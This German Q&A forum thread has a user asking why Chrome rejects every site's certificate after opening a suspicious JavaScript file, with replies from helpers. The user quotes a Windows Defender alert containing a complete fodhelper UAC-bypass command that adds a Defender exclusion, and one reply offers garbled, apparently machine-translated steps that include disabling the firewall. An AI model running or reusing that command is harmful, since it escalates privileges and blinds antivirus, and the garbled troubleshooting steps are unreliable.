Dies ist keine sichere Verbindung - Diese Meldung gibt Chrome bei jeder Seite aus. Wie kann man es beheben, dass ich Chrome wieder verwenden kann?

06.01.2021, 19:53

Das Problem trat auf, als ich gestern eine vermutlich bösartige Javascript datei geöffnet habe. Es folgt darauf der Alarm von Windows Defender "Trojan Win32/sobocat.a" wurde blockiert.

CmdLine: C:\Windows\System32\cmd.exe /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /v DelegateExecute /d /t REG_SZ && reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /d cmd /c start /min WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Windows\SysWOW64\WindowsPowerShell\v1.0" /t REG_SZ && %SystemRoot%\system32\fodhelper.exe & ping -n 7 127.0.0.1 > NUL & reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f

2 Antworten

Haenzel
06.01.2021, 19:18

ein paar Methoden die sie ausprobieren können:

Firewall deaktivieren

  1. Halten Sie die Windows-Taste gedrückt und drücken Sie R
  2. Geben Sie eine Firewall ein. cpl und drücken Sie die Eingabetaste
  3. Klicken Sie auf Windows-Firewall ein- oder ausschalten
  4. Klicken Sie auf Windows-Firewall deaktivieren (nicht empfohlen) . Tun Sie dies sowohl für öffentliche als auch für private Bereiche
  5. Klicken Sie auf OK
  6. Wiederholen Sie nun die Schritte von 3-4 und klicken Sie auf Windows Firewall einschalten,wenn Sie zu Schritt 4 kommen.

Browser resetten

Öffnen Sie Google Chrome

  1. Klicken Sie auf die Schaltfläche Einstellungen in der oberen rechten Ecke ( 3 Punkte )
  2. Scrollen Sie nach unten und wählen Sie Erweiterte Einstellungen anzeigen
  3. Scrollen Sie nach unten und klicken Sie auf Einstellungen zurücksetzen
  4. Ein Pop-up-Fenster erscheint und fragt nach Bestätigung. Klicken Sie auf Zurücksetzen
  5. Starten Sie jetzt Ihren Computer neu.

Datum und Uhrzeit ändern/korriegieren

  1. Drücken Sie die Windows-Taste einmal
  2. Wählen Sie Einstellungen
  3. Wählen Sie Zeit und Sprache
  4. Schalten Sie die Option Zeit automatisch einstellen einund stellen Sie sicher, dass sie ausgeschaltet ist
  5. Schalten Sie jetzt die Option " Zeit automatischeinstellen" erneut ein und stellen Sie sicher, dass sie eingeschaltet ist
  6. Schließen Sie die Seite.
  7. Starte deinen Computer neu

Proxy überprüfen

  1. Halten Sie die Windows-Taste gedrückt und drücken Sie R
  2. Geben Sie inetcpl ein. cpl und drücken Sie die Eingabetaste
  3. Klicken Sie auf die Registerkarte Verbindungen
  4. Klicken Sie auf LAN-Einstellungen
  5. Stellen Sie sicher, dass die Option Proxy-Server für Ihr LAN verwenden deaktiviert ist. Diese Option sollte im Abschnitt Proxy Server sein. Stellen Sie außerdem sicher, dass die Option Einstellungen automatisch erkennen aktiviert ist.
  6. Klicken Sie nun auf OK

ich hoffe ich konnte ihnen helfen

LG Sumocloud
Hulapla654 
Fragesteller
 06.01.2021, 19:46

Vielen herzlichen Dank für Ihre Mühen!
Werde ich gleich mal Schritt für Schritt so befolgen.

1
franzhartwig
Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer
Computer, Internet
06.01.2021, 19:12

Was steht denn auf der Fehlerseite sonst noch?
Hulapla654 
Fragesteller
 06.01.2021, 19:50

Schonmal herzlichen Dank für Ihre Antwort.

Hier als Screenshot, weiter unten als Text.

https://i.postimg.cc/qMGbcLph/SS.jpg Dies ist keine sichere Verbindung

Hacker könnten versuchen, Ihre Daten von www.google.de zu stehlen, zum Beispiel Passwörter, Nachrichten oder Kreditkartendaten. Weitere InformationenNET::ERR_CERT_INVALID

Subject: www.google.de

Issuer: GTS CA 1O1

Expires on: 09.03.2021

Current date: 06.01.2021

PEM encoded chain:

-----BEGIN CERTIFICATE-----

MIIExjCCA66gAwIBAgIQY2Fe5jIevjUFAAAAAIMMNzANBgkqhkiG9w0BAQsFADBC
MQswCQYDVQQGEwJVUzEeMBwGA1UEChMVR29vZ2xlIFRydXN0IFNlcnZpY2VzMRMw
EQYDVQQDEwpHVFMgQ0EgMU8xMB4XDTIwMTIxNTE0NDgxN1oXDTIxMDMwOTE0NDgx
NlowZzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAUBgNVBAcT
DU1vdW50YWluIFZpZXcxEzARBgNVBAoTCkdvb2dsZSBMTEMxFjAUBgNVBAMTDXd3
dy5nb29nbGUuZGUwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASAbM0Aljrtm5m7
xC7oeeVmeYJHUvKhOe9BtWPhzDxMq7jWFCfXgCgafBx2tHfRPDPIiTZoA7YDl8sH
bCPgBTbjo4ICXDCCAlgwDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUF
BwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFIpXxrkEKVKQf14xe2mRorH0EQDs
MB8GA1UdIwQYMBaAFJjR+G4Q68+b7GCfGJAboOt9Cf0rMGgGCCsGAQUFBwEBBFww
WjArBggrBgEFBQcwAYYfaHR0cDovL29jc3AucGtpLmdvb2cvZ3RzMW8xY29yZTAr
BggrBgEFBQcwAoYfaHR0cDovL3BraS5nb29nL2dzcjIvR1RTMU8xLmNydDAYBgNV
HREEETAPgg13d3cuZ29vZ2xlLmRlMCEGA1UdIAQaMBgwCAYGZ4EMAQICMAwGCisG
AQQB1nkCBQMwMwYDVR0fBCwwKjAooCagJIYiaHR0cDovL2NybC5wa2kuZ29vZy9H
VFMxTzFjb3JlLmNybDCCAQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AESUZS6w7s6v
xEAH2Kj+KMDa5oK+2MsxtT/TM5a1toGoAAABdmcWhmwAAAQDAEcwRQIhALUnxl/u
HLh41ECo/SEPg5l+8HL0L7ifZiyttDlai9alAiAuumBXalrwKNE2Iq7ingPl9pDC
eoKmheNSe4C7OF+NiQB3APZclC/RdzAiFFQYCDCUVo7jTRMZM7/fDC8gC8xO8WTj
AAABdmcWhicAAAQDAEgwRgIhAKs/LxJATGKNH1g8uJMq5eSKHXhb6qesdVwCUVW3
brtmAiEAonJzCK7oIph95FeFt21GJ+vSQRQYIXvYQ5G7J8KeEp0wDQYJKoZIhvcN
AQELBQADggEBAD57nZXqYjJczpKIaRhSfJNYuPI6avDTiXOuaPav045lYheUtByr
+w3RfKVZnnCHFZcu7xeVUH1OUHQv6PLB7SlcvBHj5ees2FM3F7/uLiCWzlfD9bB0
f2heIwJz7CJmELycwet27u0d9olvMFxssaTyglfPsUFlSwPSf3cR3ggLAaquAwEq
UzZwbboe7/L4yhTutXkl344cZM48u5qTnVIO7Hq2KGEt0Shz3qwLeodnnaNYz4qG
ZCcaSniiNWbFfQjz40y+oRlQfmOCqiA36zMG0KeW1oHkOpk41+FLUilSBfM3HcxZ
p1zoQY7pRB8Gh/KI/L2aZELLCWrfHrNei38=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIESjCCAzKgAwIBAgINAeO0mqGNiqmBJWlQuDANBgkqhkiG9w0BAQsFADBMMSAw
HgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMjETMBEGA1UEChMKR2xvYmFs
U2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjAeFw0xNzA2MTUwMDAwNDJaFw0yMTEy
MTUwMDAwNDJaMEIxCzAJBgNVBAYTAlVTMR4wHAYDVQQKExVHb29nbGUgVHJ1c3Qg
U2VydmljZXMxEzARBgNVBAMTCkdUUyBDQSAxTzEwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQDQGM9F1IvN05zkQO9+tN1pIRvJzzyOTHW5DzEZhD2ePCnv
UA0Qk28FgICfKqC9EksC4T2fWBYk/jCfC3R3VZMdS/dN4ZKCEPZRrAzDsiKUDzRr
mBBJ5wudgzndIMYcLe/RGGFl5yODIKgjEv/SJH/UL+dEaltN11BmsK+eQmMF++Ac
xGNhr59qM/9il71I2dN8FGfcddwuaej4bXhp0LcQBbjxMcI7JP0aM3T4I+DsaxmK
FsbjzaTNC9uzpFlgOIg7rR25xoynUxv8vNmkq7zdPGHXkxWY7oG9j+JkRyBABk7X
rJfoucBZEqFJJSPk7XA0LKW0Y3z5oz2D0c1tJKwHAgMBAAGjggEzMIIBLzAOBgNV
HQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMBIGA1Ud
EwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFJjR+G4Q68+b7GCfGJAboOt9Cf0rMB8G
A1UdIwQYMBaAFJviB1dnHB7AagbeWbSaLd/cGYYuMDUGCCsGAQUFBwEBBCkwJzAl
BggrBgEFBQcwAYYZaHR0cDovL29jc3AucGtpLmdvb2cvZ3NyMjAyBgNVHR8EKzAp
MCegJaAjhiFodHRwOi8vY3JsLnBraS5nb29nL2dzcjIvZ3NyMi5jcmwwPwYDVR0g
BDgwNjA0BgZngQwBAgIwKjAoBggrBgEFBQcCARYcaHR0cHM6Ly9wa2kuZ29vZy9y
ZXBvc2l0b3J5LzANBgkqhkiG9w0BAQsFAAOCAQEAGoA+Nnn78y6pRjd9XlQWNa7H
TgiZ/r3RNGkmUmYHPQq6Scti9PEajvwRT2iWTHQr02fesqOqBY2ETUwgZQ+lltoN
FvhsO9tvBCOIazpswWC9aJ9xju4tWDQH8NVU6YZZ/XteDSGU9YzJqPjY8q3MDxrz
mqepBCf5o8mw/wJ4a2G6xzUr6Fb6T8McDO22PLRL6u3M4Tzs3A2M1j6bykJYi8wW
IRdAvKLWZu/axBVbzYmqmwkm5zLSDW5nIAJbELCQCZwMH56t2Dvqofxs6BBcCFIZ
USpxu6x6td0V7SvJCCosirSmIatj/9dSSVDQibet8q/7UK4v4ZUN80atnZz1yg==
-----END CERTIFICATE-----
0
franzhartwig  06.01.2021, 20:08
@Hulapla654

Ich habe das Zertifikat überprüft, es ist gültig. Es ist formal gültig (Datum, Inhalte), und es ist nicht zurückgezogen. Ich kann da keinen Fehler erkennen. Ich habe keine Ahnung, warum Chrome da meckert.

0
Hulapla654 
Fragesteller
 06.01.2021, 20:19
@franzhartwig

Herzlichen Dank für deine/Ihre Mühen, sogar das Zertifikat zu überprüfen!

Ich habe meine ursprüngliche Frage oben ergänzt mit der Virusmeldung. Kannst du/Können Sie damit etwas anfangen?

0
franzhartwig  06.01.2021, 22:04
@Hulapla654

Zu Sobocat.a kann ich keine genauen Informationen finden. Wenn der Defender hier zugeschlagen hat, sollte ja (eigentlich) nichts passiert sein.

Vielleicht solltest Du Chrome mal komplett deinstallieren. Dabei solltest Du auch darauf achten, dass Reste unter %appdata% und %programdata% entfernt werden (einfach im Dateiexplorer in die Adresszeile %appdata% bzw. %programdata% eingeben). Anschließend neu installieren. Das Problem scheint sich ja auf Chrome zu konzentrieren.

0